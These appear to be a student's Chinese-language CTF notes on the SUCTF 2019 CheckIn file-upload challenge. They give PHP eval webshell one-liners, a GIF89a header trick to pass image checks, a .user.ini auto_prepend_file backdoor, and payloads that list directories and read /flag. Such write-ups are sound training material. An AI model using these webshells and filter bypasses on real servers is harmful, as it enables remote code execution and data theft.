上传图片格式的木马文件:
返回 <? in contents!,存在PHP代码检测
上传非图片格式文件:
返回 不允许非image
修改木马PHP代码规避检测
php
<? ?> 改为 < script language="php">< /script >
<?php @eval($_POST['shell']);?>
<script language='php'>@eval($_POST['shell']);</script>
上传强行加上gif文件头的GIF图片木马
php
GIF89a?<script language='php'>@eval($_POST['shell']);</script>返回如下内容:上传文件位置
现在传上去,因为还是图片格式文件,没有办法执行
尝试在"练习5"中提到的.htaccess文件,发现也被过滤了
卡住,搜索其他wp
新内容:user.ini文件
[SUCTF 2019]CheckIn 1
user.ini文件构成的PHP后门
BUUCTF | [SUCTF 2019]CheckIn
因为本题过滤非图片格式,所以必须加上前面的"GIF89a"
php
GIF89a //绕过exif_imagetype()
auto_prepend_file=a.jpg //指定在主文件之前自动解析的文件的名称,并包含该文件,就像使用require函数调用它一样。
auto_append_file=a.jpg //解析后进行包含
uploads/18de044ce1c88142786756f6f8015474/index.php
cmd=var_dump(scandir("/"));
cmd=var_dump(file_get_contents("/flag"));
但最后始终刷不出来,不知道什么情况,蚁剑也死活连不上
